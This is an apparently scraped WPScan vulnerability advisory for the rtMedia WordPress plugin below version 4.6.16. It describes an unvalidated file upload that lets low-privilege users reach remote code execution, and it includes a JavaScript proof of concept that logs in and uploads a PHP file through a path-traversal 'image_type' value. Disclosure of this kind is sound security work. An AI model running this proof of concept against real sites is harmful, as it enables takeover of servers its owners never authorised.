Lucene search

K
wpvulndbKrzysztof Zając (CERT PL)WPVDB-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A
HistoryNov 29, 2023 - 12:00 a.m.

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

2023-11-2900:00:00
Krzysztof Zając (CERT PL)
wpscan.com
2
rtmedia
wordpress
buddypress
bbpress
vulnerability
remote code execution
low-privilege users
file upload

7.4 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

19.4%

Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account (e.g. subscribers) to upload arbitrary files such as PHP on the server

PoC

If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After enabling the API in settings and installing buddypress, run the following code, replacing the username, password, and server path as needed. fetch(“/wp-admin/admin-ajax.php?action=rtmedia_api”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “method=wp_login&username;=USERNAME&password;=PASSWORD”, “method”: “POST”, }).then((response) => { return response.json(); }).then((data) => { const formData = new FormData() formData.append(‘rtmedia_file’, btoa(‘’)); formData.append(‘method’, ‘rtmedia_upload_media’); formData.append(‘image_type’, ‘./…/…/…/…/…/var/www/html/wp-content/rce.php’); formData.append(‘title’, ‘…/’); formData.append(‘token’, data.data.access_token); fetch(‘/wp-admin/admin-ajax.php?action=rtmedia_api’, { method: ‘POST’, body: formData }); });

CPENameOperatorVersion
eq4.6.16

7.4 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

19.4%

Related for WPVDB-ID:3D6889E3-A01B-4E7F-868F-AF7CC8C7531A